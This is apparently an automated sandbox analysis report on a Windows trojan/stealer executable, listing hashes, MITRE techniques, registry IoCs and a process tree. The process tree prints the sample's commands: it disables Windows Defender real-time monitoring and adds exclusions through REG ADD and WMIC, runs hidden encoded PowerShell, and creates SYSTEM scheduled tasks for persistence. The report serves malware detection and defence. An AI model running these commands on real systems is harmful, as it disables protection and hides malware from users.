2621ed268b854c0658e66cd3126a58e6c4eed8003d5578ecf1db76530dd6a286

Analysis

max time kernel
142s
max time network
150s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
07-07-2024 01:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2621ed268b854c0658e66cd3126a58e6c4eed8003d5578ecf1db76530dd6a286.exe
Size

7.2MB
MD5

e142726cbce328d804695109500b5565
SHA1

db3c997b57d8eb3a16abd9a7a2a97a7b8af81cd3
SHA256

2621ed268b854c0658e66cd3126a58e6c4eed8003d5578ecf1db76530dd6a286
SHA512

c5522a0f30cb0da19f54920e25eb41c165b2bc0c4b6957bd888da2e3de9d94edafe3383d23d0968d977b11e5e221319a3c14b90aacdd05aa94a32612222c6b92
SSDEEP

196608:91OdvBlvIF+tl2eoDfQlINIpJhJ7KblFB5LWLo+t1R+HWs:3O9XvIF+f2eINILhJWblF7LOD+2s

Score

10^/10

evasion execution spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Windows security bypass 2 TTPs 40 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\RkUDfeHyKRZhrXlO = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OniiUkVuU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\RkUDfeHyKRZhrXlO = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OniiUkVuU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oMPLyiqsgsRtC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YKxKHFRmqrfWRbNUYLR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\RfQdYYQjhFJxkqVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YKxKHFRmqrfWRbNUYLR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\RkUDfeHyKRZhrXlO = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NFFblPWVSTUU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NFFblPWVSTUU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\eveqWKwISMUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\eveqWKwISMUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oMPLyiqsgsRtC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\RfQdYYQjhFJxkqVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\RkUDfeHyKRZhrXlO = "0"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2272	powershell.EXE
3064	powershell.exe
2008	powershell.exe
2560	powershell.exe
1480	powershell.EXE
2052	powershell.EXE
2916	powershell.exe

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Executes dropped EXE 4 IoCs

pid	Process
1952	Install.exe
1800	Install.exe
2040	jnAAown.exe
924	nJebZbA.exe

Loads dropped DLL 11 IoCs

pid	Process
2044	2621ed268b854c0658e66cd3126a58e6c4eed8003d5578ecf1db76530dd6a286.exe
1952	Install.exe
1952	Install.exe
1952	Install.exe
1952	Install.exe
1800	Install.exe
1800	Install.exe
1800	Install.exe
2080	WerFault.exe
2080	WerFault.exe
2080	WerFault.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Drops file in System32 directory 9 IoCs

description	ioc	Process
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	jnAAown.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	jnAAown.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	jnAAown.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	jnAAown.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\bYIjjyXTgczhZAJGMW.job	schtasks.exe
File created	C:\Windows\Tasks\akamOyUwOLVWEybrw.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2080	2040	WerFault.exe	41

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 16 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000803ca1c20ad0da01	jnAAown.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	jnAAown.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	jnAAown.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = e0a8b6c20ad0da01	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	jnAAown.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	jnAAown.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 11 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1672	schtasks.exe
2904	schtasks.exe
1592	schtasks.exe
1212	schtasks.exe
1128	schtasks.exe
2348	schtasks.exe
2596	schtasks.exe
1312	schtasks.exe
1492	schtasks.exe
2740	schtasks.exe
3028	schtasks.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
2560	powershell.exe
1480	powershell.EXE
1480	powershell.EXE
1480	powershell.EXE
2052	powershell.EXE
2052	powershell.EXE
2052	powershell.EXE
2916	powershell.exe
2272	powershell.EXE
2272	powershell.EXE
2272	powershell.EXE

Suspicious use of AdjustPrivilegeToken 37 IoCs

description	pid	Process
Token: SeDebugPrivilege	2560	powershell.exe
Token: SeIncreaseQuotaPrivilege	3040	WMIC.exe
Token: SeSecurityPrivilege	3040	WMIC.exe
Token: SeTakeOwnershipPrivilege	3040	WMIC.exe
Token: SeLoadDriverPrivilege	3040	WMIC.exe
Token: SeSystemProfilePrivilege	3040	WMIC.exe
Token: SeSystemtimePrivilege	3040	WMIC.exe
Token: SeProfSingleProcessPrivilege	3040	WMIC.exe
Token: SeIncBasePriorityPrivilege	3040	WMIC.exe
Token: SeCreatePagefilePrivilege	3040	WMIC.exe
Token: SeBackupPrivilege	3040	WMIC.exe
Token: SeRestorePrivilege	3040	WMIC.exe
Token: SeShutdownPrivilege	3040	WMIC.exe
Token: SeDebugPrivilege	3040	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3040	WMIC.exe
Token: SeRemoteShutdownPrivilege	3040	WMIC.exe
Token: SeUndockPrivilege	3040	WMIC.exe
Token: SeManageVolumePrivilege	3040	WMIC.exe
Token: 33	3040	WMIC.exe
Token: 34	3040	WMIC.exe
Token: 35	3040	WMIC.exe
Token: SeDebugPrivilege	1480	powershell.EXE
Token: SeDebugPrivilege	2052	powershell.EXE
Token: SeDebugPrivilege	2916	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	2556	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2556	WMIC.exe
Token: SeSecurityPrivilege	2556	WMIC.exe
Token: SeTakeOwnershipPrivilege	2556	WMIC.exe
Token: SeLoadDriverPrivilege	2556	WMIC.exe
Token: SeSystemtimePrivilege	2556	WMIC.exe
Token: SeBackupPrivilege	2556	WMIC.exe
Token: SeRestorePrivilege	2556	WMIC.exe
Token: SeShutdownPrivilege	2556	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2556	WMIC.exe
Token: SeUndockPrivilege	2556	WMIC.exe
Token: SeManageVolumePrivilege	2556	WMIC.exe
Token: SeDebugPrivilege	2272	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2044 wrote to memory of 1952	2044	2621ed268b854c0658e66cd3126a58e6c4eed8003d5578ecf1db76530dd6a286.exe	30
PID 2044 wrote to memory of 1952	2044	2621ed268b854c0658e66cd3126a58e6c4eed8003d5578ecf1db76530dd6a286.exe	30
PID 2044 wrote to memory of 1952	2044	2621ed268b854c0658e66cd3126a58e6c4eed8003d5578ecf1db76530dd6a286.exe	30
PID 2044 wrote to memory of 1952	2044	2621ed268b854c0658e66cd3126a58e6c4eed8003d5578ecf1db76530dd6a286.exe	30
PID 2044 wrote to memory of 1952	2044	2621ed268b854c0658e66cd3126a58e6c4eed8003d5578ecf1db76530dd6a286.exe	30
PID 2044 wrote to memory of 1952	2044	2621ed268b854c0658e66cd3126a58e6c4eed8003d5578ecf1db76530dd6a286.exe	30
PID 2044 wrote to memory of 1952	2044	2621ed268b854c0658e66cd3126a58e6c4eed8003d5578ecf1db76530dd6a286.exe	30
PID 1952 wrote to memory of 1800	1952	Install.exe	31
PID 1952 wrote to memory of 1800	1952	Install.exe	31
PID 1952 wrote to memory of 1800	1952	Install.exe	31
PID 1952 wrote to memory of 1800	1952	Install.exe	31
PID 1952 wrote to memory of 1800	1952	Install.exe	31
PID 1952 wrote to memory of 1800	1952	Install.exe	31
PID 1952 wrote to memory of 1800	1952	Install.exe	31
PID 1800 wrote to memory of 2960	1800	Install.exe	33
PID 1800 wrote to memory of 2960	1800	Install.exe	33
PID 1800 wrote to memory of 2960	1800	Install.exe	33
PID 1800 wrote to memory of 2960	1800	Install.exe	33
PID 1800 wrote to memory of 2960	1800	Install.exe	33
PID 1800 wrote to memory of 2960	1800	Install.exe	33
PID 1800 wrote to memory of 2960	1800	Install.exe	33
PID 2960 wrote to memory of 2816	2960	forfiles.exe	35
PID 2960 wrote to memory of 2816	2960	forfiles.exe	35
PID 2960 wrote to memory of 2816	2960	forfiles.exe	35
PID 2960 wrote to memory of 2816	2960	forfiles.exe	35
PID 2960 wrote to memory of 2816	2960	forfiles.exe	35
PID 2960 wrote to memory of 2816	2960	forfiles.exe	35
PID 2960 wrote to memory of 2816	2960	forfiles.exe	35
PID 2816 wrote to memory of 2560	2816	cmd.exe	36
PID 2816 wrote to memory of 2560	2816	cmd.exe	36
PID 2816 wrote to memory of 2560	2816	cmd.exe	36
PID 2816 wrote to memory of 2560	2816	cmd.exe	36
PID 2816 wrote to memory of 2560	2816	cmd.exe	36
PID 2816 wrote to memory of 2560	2816	cmd.exe	36
PID 2816 wrote to memory of 2560	2816	cmd.exe	36
PID 2560 wrote to memory of 3040	2560	powershell.exe	37
PID 2560 wrote to memory of 3040	2560	powershell.exe	37
PID 2560 wrote to memory of 3040	2560	powershell.exe	37
PID 2560 wrote to memory of 3040	2560	powershell.exe	37
PID 2560 wrote to memory of 3040	2560	powershell.exe	37
PID 2560 wrote to memory of 3040	2560	powershell.exe	37
PID 2560 wrote to memory of 3040	2560	powershell.exe	37
PID 1800 wrote to memory of 2596	1800	Install.exe	38
PID 1800 wrote to memory of 2596	1800	Install.exe	38
PID 1800 wrote to memory of 2596	1800	Install.exe	38
PID 1800 wrote to memory of 2596	1800	Install.exe	38
PID 1800 wrote to memory of 2596	1800	Install.exe	38
PID 1800 wrote to memory of 2596	1800	Install.exe	38
PID 1800 wrote to memory of 2596	1800	Install.exe	38
PID 1244 wrote to memory of 2040	1244	taskeng.exe	41
PID 1244 wrote to memory of 2040	1244	taskeng.exe	41
PID 1244 wrote to memory of 2040	1244	taskeng.exe	41
PID 1244 wrote to memory of 2040	1244	taskeng.exe	41
PID 2040 wrote to memory of 2904	2040	jnAAown.exe	42
PID 2040 wrote to memory of 2904	2040	jnAAown.exe	42
PID 2040 wrote to memory of 2904	2040	jnAAown.exe	42
PID 2040 wrote to memory of 2904	2040	jnAAown.exe	42
PID 2040 wrote to memory of 1960	2040	jnAAown.exe	44
PID 2040 wrote to memory of 1960	2040	jnAAown.exe	44
PID 2040 wrote to memory of 1960	2040	jnAAown.exe	44
PID 2040 wrote to memory of 1960	2040	jnAAown.exe	44
PID 2368 wrote to memory of 1480	2368	taskeng.exe	47
PID 2368 wrote to memory of 1480	2368	taskeng.exe	47
PID 2368 wrote to memory of 1480	2368	taskeng.exe	47

C:\Users\Admin\AppData\Local\Temp\2621ed268b854c0658e66cd3126a58e6c4eed8003d5578ecf1db76530dd6a286.exe
"C:\Users\Admin\AppData\Local\Temp\2621ed268b854c0658e66cd3126a58e6c4eed8003d5578ecf1db76530dd6a286.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2044
- C:\Users\Admin\AppData\Local\Temp\7zSF4CA.tmp\Install.exe
  .\Install.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1952
- - C:\Users\Admin\AppData\Local\Temp\7zSF6EC.tmp\Install.exe
    .\Install.exe /KEnWdidZoN "525403" /S
    3⤵
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Loads dropped DLL
    - Enumerates system info in registry
    - Suspicious use of WriteProcessMemory
    PID:1800
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m calc.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2960
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2816
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2560
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3040
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "bYIjjyXTgczhZAJGMW" /SC once /ST 01:12:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp\nvWBhgZuGqtwSPP\jnAAown.exe\" om /DdidPIO 525403 /S" /V1 /F
      4⤵
      Drops file in Windows directory
      Scheduled Task/Job: Scheduled Task
      PID:2596

C:\Windows\system32\taskeng.exe
taskeng.exe {96A35924-5FCE-4C8A-A70F-6C736BD4C975} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Suspicious use of WriteProcessMemory
PID:1244
- C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp\nvWBhgZuGqtwSPP\jnAAown.exe
  C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp\nvWBhgZuGqtwSPP\jnAAown.exe om /DdidPIO 525403 /S
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of WriteProcessMemory
  PID:2040
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gAkNyNLjs" /SC once /ST 00:46:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2904
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gAkNyNLjs"
    3⤵
    PID:1960
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gAkNyNLjs"
    3⤵
    PID:2152
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:1540
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:2192
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:1976
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:2172
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gjTSdYqVn" /SC once /ST 00:47:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1312
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gjTSdYqVn"
    3⤵
    PID:2148
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gjTSdYqVn"
    3⤵
    PID:2892
- - C:\Windows\SysWOW64\forfiles.exe
    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
    3⤵
    PID:2420
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
      4⤵
      PID:2880
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2916
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2556
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2960
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1616
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1404
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1144
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:856
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2740
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2620
  - - C:\Windows\SysWOW64\reg.exe
